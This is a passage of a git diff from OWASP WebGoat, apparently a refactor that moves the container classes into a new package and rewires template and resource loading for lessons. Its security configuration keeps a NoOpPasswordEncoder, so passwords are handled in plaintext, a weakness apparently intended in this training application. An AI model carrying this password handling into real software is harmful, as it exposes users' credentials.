         return new StringTemplateResource(new String(resource, StandardCharsets.UTF_8));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
similarity index 61%
rename from webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java
rename to src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
index 91b08d2f6..182fbffbe 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
@@ -29,39 +29,51 @@
  * @since October 28, 2003
  */
 
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
-import org.owasp.webgoat.i18n.Language;
-import org.owasp.webgoat.i18n.Messages;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.LabelDebugger;
+import lombok.RequiredArgsConstructor;
+import org.owasp.webgoat.container.i18n.Language;
+import org.owasp.webgoat.container.i18n.Messages;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.lessons.LessonScanner;
+import org.owasp.webgoat.container.session.LabelDebugger;
 import org.springframework.context.ApplicationContext;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.core.io.ResourceLoader;
+import org.springframework.core.io.support.ResourcePatternResolver;
 import org.springframework.web.servlet.LocaleResolver;
 import org.springframework.web.servlet.ViewResolver;
 import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
 import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
 import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
 import org.springframework.web.servlet.i18n.SessionLocaleResolver;
-import org.thymeleaf.TemplateEngine;
+import org.thymeleaf.IEngineConfiguration;
 import org.thymeleaf.extras.springsecurity5.dialect.SpringSecurityDialect;
 import org.thymeleaf.spring5.SpringTemplateEngine;
 import org.thymeleaf.spring5.templateresolver.SpringResourceTemplateResolver;
 import org.thymeleaf.spring5.view.ThymeleafViewResolver;
 import org.thymeleaf.templatemode.TemplateMode;
+import org.thymeleaf.templateresolver.FileTemplateResolver;
 import org.thymeleaf.templateresolver.ITemplateResolver;
+import org.thymeleaf.templateresource.ITemplateResource;
+import org.thymeleaf.templateresource.StringTemplateResource;
 
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.util.Map;
 import java.util.Set;
 
 /**
  * Configuration for Spring MVC
  */
 @Configuration
+@RequiredArgsConstructor
 public class MvcConfiguration implements WebMvcConfigurer {
-	
-	private static final String UTF8 = "UTF-8";
+
+    private static final String UTF8 = "UTF-8";
+
+    private final LessonScanner lessonScanner;
 
     @Override
     public void addViewControllers(ViewControllerRegistry registry) {
@@ -69,30 +81,55 @@ public class MvcConfiguration implements WebMvcConfigurer {
         registry.addViewController("/lesson_content").setViewName("lesson_content");
         registry.addViewController("/start.mvc").setViewName("main_new");
         registry.addViewController("/scoreboard").setViewName("scoreboard");
-        //registry.addViewController("/list_users").setViewName("list_users");
     }
 
     @Bean
     public ViewResolver viewResolver(SpringTemplateEngine thymeleafTemplateEngine) {
         ThymeleafViewResolver resolver = new ThymeleafViewResolver();
         resolver.setTemplateEngine(thymeleafTemplateEngine);
-        resolver.setCharacterEncoding("UTF-8");
+        resolver.setCharacterEncoding(StandardCharsets.UTF_8.displayName());
         return resolver;
     }
 
+    /**
+     * Responsible for loading lesson templates based on Thymeleaf, for example:
+     *
+     * <div th:include="/lessons/spoofcookie/templates/spoofcookieform.html" id="content"></div>
+     */
+    @Bean
+    public ITemplateResolver lessonThymeleafTemplateResolver(ResourceLoader resourceLoader) {
+        var resolver = new FileTemplateResolver() {
+            @Override
+            protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
+               try (var is = resourceLoader.getResource("classpath:" + resourceName).getInputStream()) {
+                    return new StringTemplateResource(new String(is.readAllBytes(), StandardCharsets.UTF_8));
+               } catch (IOException e) {
+                   return null;
+               }
+            }
+        };
+        resolver.setOrder(1);
+        return resolver;
+    }
+
+    /**
+     * Loads all normal WebGoat specific Thymeleaf templates
+     */
     @Bean
     public ITemplateResolver springThymeleafTemplateResolver(ApplicationContext applicationContext) {
         SpringResourceTemplateResolver resolver = new SpringResourceTemplateResolver();
-        resolver.setPrefix("classpath:/templates/");
+        resolver.setPrefix("classpath:/webgoat/templates/");
         resolver.setSuffix(".html");
         resolver.setTemplateMode(TemplateMode.HTML);
         resolver.setOrder(2);
-        resolver.setCacheable(false);
         resolver.setCharacterEncoding(UTF8);
         resolver.setApplicationContext(applicationContext);
         return resolver;
     }
 
+    /**
+     * Loads the html for the complete lesson, see lesson_content.html
+     */
     @Bean
     public LessonTemplateResolver lessonTemplateResolver(ResourceLoader resourceLoader) {
         LessonTemplateResolver resolver = new LessonTemplateResolver(resourceLoader);
@@ -102,9 +139,12 @@ public class MvcConfiguration implements WebMvcConfigurer {
         return resolver;
     }
 
+    /**
+     * Loads the lesson asciidoc.
+     */
     @Bean
-    public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(Language language) {
-        AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(language);
+    public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(ResourceLoader resourceLoader) {
+        AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(resourceLoader);
         resolver.setCacheable(false);
         resolver.setOrder(1);
         resolver.setCharacterEncoding(UTF8);
@@ -114,26 +154,37 @@ public class MvcConfiguration implements WebMvcConfigurer {
     @Bean
     public SpringTemplateEngine thymeleafTemplateEngine(ITemplateResolver springThymeleafTemplateResolver,
                                                         LessonTemplateResolver lessonTemplateResolver,
-                                                        AsciiDoctorTemplateResolver asciiDoctorTemplateResolver) {
+                                                        AsciiDoctorTemplateResolver asciiDoctorTemplateResolver,
+                                                        ITemplateResolver lessonThymeleafTemplateResolver) {
         SpringTemplateEngine engine = new SpringTemplateEngine();
         engine.setEnableSpringELCompiler(true);
         engine.addDialect(new SpringSecurityDialect());
         engine.setTemplateResolvers(
-                Set.of(lessonTemplateResolver, asciiDoctorTemplateResolver, springThymeleafTemplateResolver));
+                Set.of(lessonTemplateResolver, asciiDoctorTemplateResolver, lessonThymeleafTemplateResolver, springThymeleafTemplateResolver));
         return engine;
     }
 
     @Override
     public void addResourceHandlers(ResourceHandlerRegistry registry) {
-        registry.addResourceHandler("/images/**").addResourceLocations("classpath:/images/");
-        registry.addResourceHandler("/lesson_js/**").addResourceLocations("classpath:/js/");
-        registry.addResourceHandler("/lesson_css/**").addResourceLocations("classpath:/css/");
-        registry.addResourceHandler("/video/**").addResourceLocations("classpath:/video/");
+        //WebGoat internal
+        registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webgoat/static/css/");
+        registry.addResourceHandler("/js/**")
+                .addResourceLocations("classpath:/webgoat/static/js/");
+        registry.addResourceHandler("/plugins/**").addResourceLocations("classpath:/webgoat/static/plugins/");
+        registry.addResourceHandler("/fonts/**").addResourceLocations("classpath:/webgoat/static/fonts/");
+
+        //WebGoat lessons
+        registry.addResourceHandler("/images/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/images/").toArray(String[]::new));
+        registry.addResourceHandler("/lesson_js/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/js/").toArray(String[]::new));
+        registry.addResourceHandler("/lesson_css/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/css/").toArray(String[]::new));
+        registry.addResourceHandler("/lesson_templates/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/templates/").toArray(String[]::new));
+        registry.addResourceHandler("/video/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/video/").toArray(String[]::new));
     }
 
     @Bean
-    public PluginMessages pluginMessages(Messages messages, Language language) {
-        PluginMessages pluginMessages = new PluginMessages(messages, language);
+    public PluginMessages pluginMessages(Messages messages, Language language,
+                                         ResourcePatternResolver resourcePatternResolver) {
+        PluginMessages pluginMessages = new PluginMessages(messages, language, resourcePatternResolver);
         pluginMessages.setDefaultEncoding("UTF-8");
         pluginMessages.setBasenames("i18n/WebGoatLabels");
         pluginMessages.setFallbackToSystemLocale(false);
@@ -156,13 +207,12 @@ public class MvcConfiguration implements WebMvcConfigurer {
 
     @Bean
     public LocaleResolver localeResolver() {
-        SessionLocaleResolver slr = new SessionLocaleResolver();
-        return slr;
+        return new SessionLocaleResolver();
     }
-    
+
     @Bean
     public LabelDebugger labelDebugger() {
         return new LabelDebugger();
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/WebGoat.java b/src/main/java/org/owasp/webgoat/container/WebGoat.java
similarity index 81%
rename from webgoat-container/src/main/java/org/owasp/webgoat/WebGoat.java
rename to src/main/java/org/owasp/webgoat/container/WebGoat.java
index 850faa1ac..b44f4b5e7 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/WebGoat.java
+++ b/src/main/java/org/owasp/webgoat/container/WebGoat.java
@@ -29,13 +29,16 @@
  * @since October 28, 2003
  */
 
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
-import org.owasp.webgoat.session.UserSessionData;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.session.UserSessionData;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
+import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
 import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.ComponentScan;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.PropertySource;
 import org.springframework.context.annotation.Scope;
 import org.springframework.context.annotation.ScopedProxyMode;
 import org.springframework.web.client.RestTemplate;
@@ -43,6 +46,9 @@ import org.springframework.web.client.RestTemplate;
 import java.io.File;
 
 @Configuration
+@ComponentScan(basePackages = { "org.owasp.webgoat.container", "org.owasp.webgoat.lessons"})
+@PropertySource("classpath:application-webgoat.properties")
+@EnableAutoConfiguration
 public class WebGoat {
 
     @Bean(name = "pluginTargetDirectory")
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java b/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
similarity index 95%
rename from webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java
rename to src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
index 4766bc5aa..aabcd257c 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java
+++ b/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
@@ -28,10 +28,10 @@
  * @since December 12, 2015
  */
 
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webgoat.users.UserService;
+import org.owasp.webgoat.container.users.UserService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
@@ -77,7 +77,7 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
 
     @Autowired
     public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
-        auth.userDetailsService(userDetailsService); //.passwordEncoder(bCryptPasswordEncoder());
+        auth.userDetailsService(userDetailsService);
     }
 
     @Bean
@@ -97,4 +97,4 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     public NoOpPasswordEncoder passwordEncoder() {
         return (NoOpPasswordEncoder) NoOpPasswordEncoder.getInstance();
     }
-}
\ No newline at end of file
+}
diff --git a/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java b/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java
new file mode 100644
index 000000000..b3e26c10a
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java
@@ -0,0 +1,21 @@
+package org.owasp.webgoat.container;
+
+import lombok.RequiredArgsConstructor;
+import org.springframework.context.ApplicationContext;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.servlet.ModelAndView;
+
+@Controller
+@RequiredArgsConstructor
+public class WebWolfRedirect {
+
+    private final ApplicationContext applicationContext;
+
+    @GetMapping("/WebWolf")
+    public ModelAndView openWebWolf() {
+        var url = applicationContext.getEnvironment().getProperty("webwolf.url");
+
+        return new ModelAndView("redirect:" + url + "/home");
+    }
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java b/src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
similarity index 94%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
index 141740523..16175c3c7 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import org.springframework.beans.BeansException;
 import org.springframework.context.ApplicationContext;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/OperatingSystemMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
similarity index 94%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/OperatingSystemMacro.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
index 4671a9fd5..c40c30fe6 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/OperatingSystemMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/UsernameMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
similarity index 80%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/UsernameMacro.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
index f44e2cf62..ac4fe0535 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/UsernameMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
-import org.owasp.webgoat.users.WebGoatUser;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.security.core.context.SecurityContextHolder;
 
 import java.util.Map;
@@ -21,8 +21,8 @@ public class UsernameMacro extends InlineMacroProcessor {
     public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
         var auth = SecurityContextHolder.getContext().getAuthentication();
         var username = "unknown";
-        if (auth.getPrincipal() instanceof WebGoatUser) {
-            username = ((WebGoatUser) auth.getPrincipal()).getUsername();
+        if (auth.getPrincipal() instanceof WebGoatUser webGoatUser) {
+            username = webGoatUser.getUsername();
         }
 
         //see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatTmpDirMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
similarity index 94%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatTmpDirMacro.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
index 0636e9823..c7158378d 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatTmpDirMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatVersionMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
similarity index 94%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatVersionMacro.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
index 15ff78ae5..929136c45 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatVersionMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
similarity index 88%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
index d54a307cf..4a736c96f 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
@@ -27,7 +27,7 @@ public class WebWolfMacro extends InlineMacroProcessor {
     @Override
     public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) {
         var env = EnvironmentExposure.getEnv();
-        var hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+        var hostname = determineHost(env.getProperty("webwolf.port"));
         var target = (String) attributes.getOrDefault("target", "home");
         var href = hostname + "/" + target;
 
@@ -44,7 +44,7 @@ public class WebWolfMacro extends InlineMacroProcessor {
     }
 
     private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
-        return attributes.values().stream().filter(a -> a.equals("noLink")).findFirst().isPresent();
+        return attributes.values().stream().anyMatch(a -> a.equals("noLink"));
     }
 
     /**
@@ -54,9 +54,9 @@ public class WebWolfMacro extends InlineMacroProcessor {
      * You do not have to use the indicated hostname, but if you do, you should define two hosts aliases
      * 127.0.0.1 www.webgoat.local www.webwolf.local
      */
-    private String determineHost(String host, String port) {
+    private String determineHost(String port) {
         HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
-        host = request.getHeader("Host");
+        String host = request.getHeader("Host");
         int semicolonIndex = host.indexOf(":");
         if (semicolonIndex == -1 || host.endsWith(":80")) {
             host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
similarity index 90%
rename from webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java
rename to src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
index 7491af6fb..8c5d5450c 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.asciidoc;
+package org.owasp.webgoat.container.asciidoc;
 
 import java.util.Map;
 
@@ -18,6 +18,7 @@ public class WebWolfRootMacro extends WebWolfMacro {
         super(macroName, config);
     }
 
+    @Override
     protected boolean includeWebWolfContext() {
         return false;
     }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
similarity index 86%
rename from webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
rename to src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
index 9ff9a5cde..09e4d7cfc 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
@@ -23,16 +23,17 @@
  * <p>
  */
 
-package org.owasp.webgoat.assignments;
+package org.owasp.webgoat.container.assignments;
 
 import lombok.Getter;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.UserSessionData;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.lessons.Initializeable;
+import org.owasp.webgoat.container.session.UserSessionData;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.beans.factory.annotation.Autowired;
 
-public abstract class AssignmentEndpoint {
+public abstract class AssignmentEndpoint implements Initializeable {
 
     @Autowired
     private WebSession webSession;
@@ -83,4 +84,8 @@ public abstract class AssignmentEndpoint {
     protected AttackResult.AttackResultBuilder informationMessage(AssignmentEndpoint assignment) {
         return AttackResult.builder(messages).lessonCompleted(false).assignment(assignment);
     }
+
+    @Override
+    public void initialize(WebGoatUser user) {
+    }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentHints.java b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
similarity index 87%
rename from webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentHints.java
rename to src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
index 6d29dbe6f..b6111b5c7 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentHints.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.assignments;
+package org.owasp.webgoat.container.assignments;
 
 import java.lang.annotation.ElementType;
 import java.lang.annotation.Retention;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentPath.java b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
similarity index 90%
rename from webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentPath.java
rename to src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
index bb7f31a69..7e57d593b 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentPath.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.assignments;
+package org.owasp.webgoat.container.assignments;
 
 import org.springframework.web.bind.annotation.RequestMethod;
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AttackResult.java b/src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
similarity index 93%
rename from webgoat-container/src/main/java/org/owasp/webgoat/assignments/AttackResult.java
rename to src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
index 1bc48609e..b2d18b7a6 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AttackResult.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
@@ -23,11 +23,12 @@
  * <p>
  */
 
-package org.owasp.webgoat.assignments;
+package org.owasp.webgoat.container.assignments;
 
 import lombok.Getter;
-import org.apache.commons.lang3.StringEscapeUtils;
-import org.owasp.webgoat.i18n.PluginMessages;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+
+import static org.apache.commons.text.StringEscapeUtils.escapeJson;
 
 public class AttackResult {
 
@@ -107,8 +108,8 @@ public class AttackResult {
 
     public AttackResult(boolean lessonCompleted, String feedback, String output, String assignment, boolean attemptWasMade) {
         this.lessonCompleted = lessonCompleted;
-        this.feedback = StringEscapeUtils.escapeJson(feedback);
-        this.output = StringEscapeUtils.escapeJson(output);
+        this.feedback = escapeJson(feedback);
+        this.output = escapeJson(output);
         this.assignment = assignment;
         this.attemptWasMade = attemptWasMade;
     }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/LessonTrackerInterceptor.java b/src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
similarity index 90%
rename from webgoat-container/src/main/java/org/owasp/webgoat/assignments/LessonTrackerInterceptor.java
rename to src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
index b378979bf..5b15965d9 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/LessonTrackerInterceptor.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.assignments;
+package org.owasp.webgoat.container.assignments;
 
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.core.MethodParameter;
 import org.springframework.http.MediaType;
 import org.springframework.http.converter.HttpMessageConverter;
@@ -51,8 +51,8 @@ public class LessonTrackerInterceptor implements ResponseBodyAdvice<Object> {
 
     @Override
     public Object beforeBodyWrite(Object o, MethodParameter methodParameter, MediaType mediaType, Class<? extends HttpMessageConverter<?>> aClass, ServerHttpRequest serverHttpRequest, ServerHttpResponse serverHttpResponse) {
-        if (o != null && o instanceof AttackResult) {
-            trackProgress((AttackResult) o);
+        if (o instanceof AttackResult attackResult) {
+            trackProgress(attackResult);
         }
         return o;
     }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/controller/StartLesson.java b/src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
similarity index 63%
rename from webgoat-container/src/main/java/org/owasp/webgoat/controller/StartLesson.java
rename to src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
index 4c9b25caa..8093a9d03 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/controller/StartLesson.java
+++ b/src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
@@ -29,21 +29,16 @@
  * @since October 28, 2003
  */
 
-package org.owasp.webgoat.controller;
+package org.owasp.webgoat.container.controller;
 
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.Course;
-import org.owasp.webgoat.session.WebSession;
-import org.springframework.security.core.context.SecurityContext;
-import org.springframework.security.core.context.SecurityContextHolder;
+import org.owasp.webgoat.container.session.Course;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.servlet.ModelAndView;
 
 import javax.servlet.http.HttpServletRequest;
-import java.util.List;
-import java.util.Optional;
 
 
 @Controller
@@ -52,7 +47,7 @@ public class StartLesson {
     private final WebSession ws;
     private final Course course;
 
-    public StartLesson(final WebSession ws, final Course course) {
+    public StartLesson(WebSession ws, Course course) {
         this.ws = ws;
         this.course = course;
     }
@@ -64,29 +59,30 @@ public class StartLesson {
      */
     @RequestMapping(path = "startlesson.mvc", method = {RequestMethod.GET, RequestMethod.POST})
     public ModelAndView start() {
-        ModelAndView model = new ModelAndView();
+        var model = new ModelAndView();
 
         model.addObject("course", course);
         model.addObject("lesson", ws.getCurrentLesson());
         model.setViewName("lesson_content");
+
         return model;
     }
 
     @RequestMapping(value = {"*.lesson"}, produces = "text/html")
     public ModelAndView lessonPage(HttpServletRequest request) {
-        // I will set here the thymeleaf fragment location based on the resource requested.
-        ModelAndView model = new ModelAndView();
-        SecurityContext context = SecurityContextHolder.getContext(); //TODO this should work with the security roles of Spring
-        //GrantedAuthority authority = context.getAuthentication().getAuthorities().iterator().next();
-        String path = request.getRequestURL().toString(); // we now got /a/b/c/AccessControlMatrix.lesson
-        String lessonName = path.substring(path.lastIndexOf('/') + 1, path.indexOf(".lesson"));
-        List<? extends Lesson> lessons = course.getLessons();
-        Optional<? extends Lesson> lesson = lessons.stream()
+        var model = new ModelAndView("lesson_content");
+        var path = request.getRequestURL().toString(); // we now got /a/b/c/AccessControlMatrix.lesson
+        var lessonName = path.substring(path.lastIndexOf('/') + 1, path.indexOf(".lesson"));
+
+        course.getLessons()
+                .stream()
                 .filter(l -> l.getId().equals(lessonName))
-                .findFirst();
-        ws.setCurrentLesson(lesson.get());
-        model.setViewName("lesson_content");
-        model.addObject("lesson", lesson.get());
+                .findFirst()
+                .ifPresent(lesson -> {
+                    ws.setCurrentLesson(lesson);
+                    model.addObject("lesson", lesson);
+                });
+
         return model;
     }
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/controller/Welcome.java b/src/main/java/org/owasp/webgoat/container/controller/Welcome.java
similarity index 88%
rename from webgoat-container/src/main/java/org/owasp/webgoat/controller/Welcome.java
rename to src/main/java/org/owasp/webgoat/container/controller/Welcome.java
index 8ee52acb2..1ea65f3ee 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/controller/Welcome.java
+++ b/src/main/java/org/owasp/webgoat/container/controller/Welcome.java
@@ -29,11 +29,10 @@
  * @version $Id: $Id
  */
 
-package org.owasp.webgoat.controller;
+package org.owasp.webgoat.container.controller;
 
